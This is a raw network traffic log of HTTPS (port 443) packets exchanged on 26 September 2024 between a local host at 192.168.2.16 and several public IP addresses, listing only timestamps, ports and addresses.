Sep 26, 2024 17:55:30.859399080 CEST	443	49779	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:30.864209890 CEST	49779	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:30.864223003 CEST	443	49779	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:30.871085882 CEST	443	49780	2.18.97.153	192.168.2.16
Sep 26, 2024 17:55:30.871176004 CEST	49780	443	192.168.2.16	2.18.97.153
Sep 26, 2024 17:55:30.874736071 CEST	49780	443	192.168.2.16	2.18.97.153
Sep 26, 2024 17:55:30.874744892 CEST	443	49780	2.18.97.153	192.168.2.16
Sep 26, 2024 17:55:30.875112057 CEST	443	49780	2.18.97.153	192.168.2.16
Sep 26, 2024 17:55:30.883074045 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.883282900 CEST	49783	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.883300066 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.883403063 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.883646011 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.883963108 CEST	49783	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.884027004 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.884089947 CEST	49783	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.902412891 CEST	443	49775	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.910054922 CEST	443	49775	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.910129070 CEST	49775	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.910846949 CEST	49775	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.910872936 CEST	443	49775	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.912209034 CEST	49779	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:30.917792082 CEST	49780	443	192.168.2.16	2.18.97.153
Sep 26, 2024 17:55:30.931395054 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.952786922 CEST	443	49777	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.952815056 CEST	443	49777	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.952877998 CEST	49777	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.952897072 CEST	443	49777	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.953124046 CEST	443	49777	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.953182936 CEST	49777	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.953918934 CEST	49777	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.953938007 CEST	443	49777	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.953967094 CEST	49777	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.953986883 CEST	49777	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.958276033 CEST	49793	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.958317041 CEST	443	49793	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.958373070 CEST	49793	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.958576918 CEST	49793	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.958592892 CEST	443	49793	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.959407091 CEST	443	49780	2.18.97.153	192.168.2.16
Sep 26, 2024 17:55:30.961319923 CEST	443	49785	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.961580038 CEST	49785	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.961591959 CEST	443	49785	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.961922884 CEST	443	49785	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.962346077 CEST	49785	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.962414026 CEST	443	49785	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.962635994 CEST	49794	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.962667942 CEST	443	49794	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.962740898 CEST	49794	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.962743998 CEST	49785	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.962759018 CEST	443	49785	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.962927103 CEST	49794	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.962943077 CEST	443	49794	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.987090111 CEST	443	49786	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.987334967 CEST	49786	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.987350941 CEST	443	49786	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.988430023 CEST	443	49786	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.988516092 CEST	49786	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.988945007 CEST	49786	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.989013910 CEST	49786	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.989017963 CEST	443	49786	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.989083052 CEST	443	49786	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.014565945 CEST	443	49784	52.165.165.26	192.168.2.16
Sep 26, 2024 17:55:31.014637947 CEST	49784	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:55:31.017966032 CEST	49784	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:55:31.017973900 CEST	443	49784	52.165.165.26	192.168.2.16
Sep 26, 2024 17:55:31.018227100 CEST	443	49784	52.165.165.26	192.168.2.16
Sep 26, 2024 17:55:31.025895119 CEST	443	49787	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.026114941 CEST	49787	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.026125908 CEST	443	49787	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.027190924 CEST	443	49787	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.027261019 CEST	49787	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.027563095 CEST	49787	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.027641058 CEST	443	49787	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.027775049 CEST	49787	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.027781963 CEST	443	49787	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.038203001 CEST	49786	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.038214922 CEST	443	49786	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.070204973 CEST	49784	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:55:31.070482969 CEST	49787	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.083280087 CEST	49784	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:55:31.086186886 CEST	49786	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.107444048 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.107491016 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.107527018 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.107561111 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.107568979 CEST	49782	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.107594967 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.107610941 CEST	49782	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.107628107 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.107686996 CEST	49782	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.107692957 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.113440990 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.113782883 CEST	49782	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.113789082 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.118033886 CEST	443	49779	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:31.118093967 CEST	443	49779	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:31.118494034 CEST	49779	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:31.118503094 CEST	443	49779	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:31.119720936 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.119791031 CEST	49782	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.119797945 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.120440006 CEST	49779	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:31.120488882 CEST	443	49779	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:31.120573044 CEST	49779	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:31.126825094 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.126880884 CEST	49782	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.126885891 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.127407074 CEST	443	49784	52.165.165.26	192.168.2.16
Sep 26, 2024 17:55:31.138432026 CEST	443	49788	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.138695955 CEST	49788	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.138721943 CEST	443	49788	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.139831066 CEST	443	49788	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.139924049 CEST	49788	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.140391111 CEST	49788	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.140467882 CEST	443	49788	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.140590906 CEST	49788	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.140602112 CEST	443	49788	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.158586979 CEST	443	49785	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.159090042 CEST	443	49785	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.159411907 CEST	49785	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.159436941 CEST	443	49785	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.159508944 CEST	49785	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.159508944 CEST	49785	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.164518118 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.164554119 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.164578915 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.164598942 CEST	49783	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.164604902 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.164613962 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.164649010 CEST	49783	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.164650917 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.164659023 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.164696932 CEST	49783	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.170569897 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.170645952 CEST	49783	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.170660973 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.173679113 CEST	443	49786	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.173732042 CEST	443	49786	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.173852921 CEST	49786	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.173866987 CEST	443	49786	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.173877954 CEST	443	49786	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.173934937 CEST	49786	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.174679995 CEST	49786	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.174693108 CEST	443	49786	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.176873922 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.176937103 CEST	49783	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.176950932 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.182204962 CEST	49788	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.182216883 CEST	49782	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.183233023 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.183290958 CEST	49783	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.183305025 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.193490982 CEST	49795	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.193523884 CEST	443	49795	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.193598032 CEST	49795	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.194138050 CEST	49795	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.194149017 CEST	443	49795	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.194173098 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.196527004 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.196559906 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.196582079 CEST	49782	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.196589947 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.196625948 CEST	49782	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.202902079 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.209192991 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.209249020 CEST	49782	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.209259987 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.209506035 CEST	49782	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.209562063 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.209606886 CEST	49782	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.220060110 CEST	49796	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.220081091 CEST	443	49796	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.220156908 CEST	49796	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.220585108 CEST	49796	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.220597029 CEST	443	49796	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.225641966 CEST	443	49787	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.226454020 CEST	443	49787	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.226509094 CEST	49787	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.226800919 CEST	49787	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.226815939 CEST	443	49787	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.226830006 CEST	49787	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.226857901 CEST	49787	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.229197979 CEST	49783	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.266146898 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.266197920 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.266232014 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.266273975 CEST	49783	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.266293049 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.266376019 CEST	49783	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.266381979 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.267540932 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.267570972 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.267599106 CEST	49783	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.267607927 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.267647982 CEST	49783	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.272506952 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.278815985 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.278837919 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.278863907 CEST	49783	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.278877020 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.278955936 CEST	49783	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.285063982 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.291004896 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.291049957 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.291059971 CEST	49783	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.291073084 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.291120052 CEST	49783	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.297106981 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.302738905 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.302772045 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.302809000 CEST	49783	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.302822113 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.302861929 CEST	49783	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.308691978 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.309045076 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.309117079 CEST	49783	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.309907913 CEST	49783	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.309923887 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.316106081 CEST	443	49784	52.165.165.26	192.168.2.16
Sep 26, 2024 17:55:31.316133976 CEST	443	49784	52.165.165.26	192.168.2.16
Sep 26, 2024 17:55:31.316143990 CEST	443	49784	52.165.165.26	192.168.2.16
Sep 26, 2024 17:55:31.316171885 CEST	443	49784	52.165.165.26	192.168.2.16
Sep 26, 2024 17:55:31.316183090 CEST	443	49784	52.165.165.26	192.168.2.16
Sep 26, 2024 17:55:31.316195011 CEST	443	49784	52.165.165.26	192.168.2.16
Sep 26, 2024 17:55:31.316201925 CEST	49784	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:55:31.316232920 CEST	443	49784	52.165.165.26	192.168.2.16
Sep 26, 2024 17:55:31.316257000 CEST	49784	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:55:31.316281080 CEST	49784	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:55:31.316696882 CEST	443	49784	52.165.165.26	192.168.2.16
Sep 26, 2024 17:55:31.316752911 CEST	49784	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:55:31.316765070 CEST	443	49784	52.165.165.26	192.168.2.16
Sep 26, 2024 17:55:31.317079067 CEST	443	49784	52.165.165.26	192.168.2.16
Sep 26, 2024 17:55:31.317126036 CEST	49784	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:55:31.330197096 CEST	49784	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:55:31.330230951 CEST	443	49784	52.165.165.26	192.168.2.16
Sep 26, 2024 17:55:31.330248117 CEST	49784	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:55:31.330256939 CEST	443	49784	52.165.165.26	192.168.2.16
Sep 26, 2024 17:55:31.335011005 CEST	443	49788	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.335103035 CEST	443	49788	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.335201979 CEST	49788	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.335549116 CEST	49788	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.335566998 CEST	443	49788	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.335587978 CEST	49788	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.339478970 CEST	49788	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.342818022 CEST	443	49780	2.18.97.153	192.168.2.16
Sep 26, 2024 17:55:31.343060017 CEST	49780	443	192.168.2.16	2.18.97.153
Sep 26, 2024 17:55:31.343080997 CEST	443	49780	2.18.97.153	192.168.2.16
Sep 26, 2024 17:55:31.343126059 CEST	49780	443	192.168.2.16	2.18.97.153
Sep 26, 2024 17:55:31.343280077 CEST	443	49780	2.18.97.153	192.168.2.16
Sep 26, 2024 17:55:31.343324900 CEST	443	49780	2.18.97.153	192.168.2.16
Sep 26, 2024 17:55:31.343408108 CEST	49780	443	192.168.2.16	2.18.97.153
Sep 26, 2024 17:55:31.378473997 CEST	49797	443	192.168.2.16	2.18.97.153
Sep 26, 2024 17:55:31.378524065 CEST	443	49797	2.18.97.153	192.168.2.16
Sep 26, 2024 17:55:31.378658056 CEST	49797	443	192.168.2.16	2.18.97.153
Sep 26, 2024 17:55:31.379024029 CEST	49797	443	192.168.2.16	2.18.97.153
Sep 26, 2024 17:55:31.379039049 CEST	443	49797	2.18.97.153	192.168.2.16
Sep 26, 2024 17:55:31.562402964 CEST	49798	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.562444925 CEST	443	49798	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.562541962 CEST	49798	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.562762976 CEST	49798	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.562777996 CEST	443	49798	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.567858934 CEST	49799	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.567895889 CEST	443	49799	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.568011045 CEST	49799	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.568468094 CEST	49799	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.568479061 CEST	443	49799	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.589306116 CEST	443	49793	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.590389013 CEST	443	49794	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.590764999 CEST	49794	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.590790987 CEST	443	49794	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.591128111 CEST	443	49794	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.591139078 CEST	49793	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.591159105 CEST	443	49793	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.591648102 CEST	443	49793	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.591680050 CEST	49794	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.591754913 CEST	443	49794	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.591900110 CEST	49794	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.591916084 CEST	443	49794	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.592103004 CEST	49793	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.592186928 CEST	443	49793	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.592210054 CEST	49793	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.639405012 CEST	443	49793	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.642782927 CEST	49793	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.774877071 CEST	443	49794	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.774916887 CEST	443	49794	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.774992943 CEST	49794	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.775018930 CEST	443	49794	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.775068045 CEST	443	49794	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.775130033 CEST	49794	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.775916100 CEST	49794	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.775930882 CEST	443	49794	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.775963068 CEST	49794	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.775990009 CEST	49794	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.839219093 CEST	49801	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.839241028 CEST	443	49801	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.841800928 CEST	49801	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.842408895 CEST	49801	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.842418909 CEST	443	49801	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.843184948 CEST	49802	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:31.843225002 CEST	443	49802	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:31.843796015 CEST	49802	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:31.843796015 CEST	49802	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:31.843828917 CEST	443	49802	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:31.850553036 CEST	443	49795	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.850821972 CEST	49795	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.850836039 CEST	443	49795	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.851849079 CEST	443	49795	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.851991892 CEST	49795	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.852348089 CEST	49795	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.852410078 CEST	443	49795	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.852478981 CEST	443	49796	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.852606058 CEST	49795	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.852612972 CEST	443	49795	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.854975939 CEST	49796	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.854983091 CEST	443	49796	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.855443954 CEST	443	49796	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.855886936 CEST	49796	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.855886936 CEST	49796	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:31.855901003 CEST	443	49796	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.855963945 CEST	443	49796	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:31.861907959 CEST	443	49793	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.861957073 CEST	443	49793	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.862107038 CEST	443	49793	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.862131119 CEST	49793	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.862442970 CEST	49793	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.863141060 CEST	49793	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.863157988 CEST	443	49793	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:31.893300056 CEST	49795	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:31.909243107 CEST	49796	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.006226063 CEST	49678	443	192.168.2.16	20.189.173.10
Sep 26, 2024 17:55:32.024864912 CEST	443	49797	2.18.97.153	192.168.2.16
Sep 26, 2024 17:55:32.025058031 CEST	49797	443	192.168.2.16	2.18.97.153
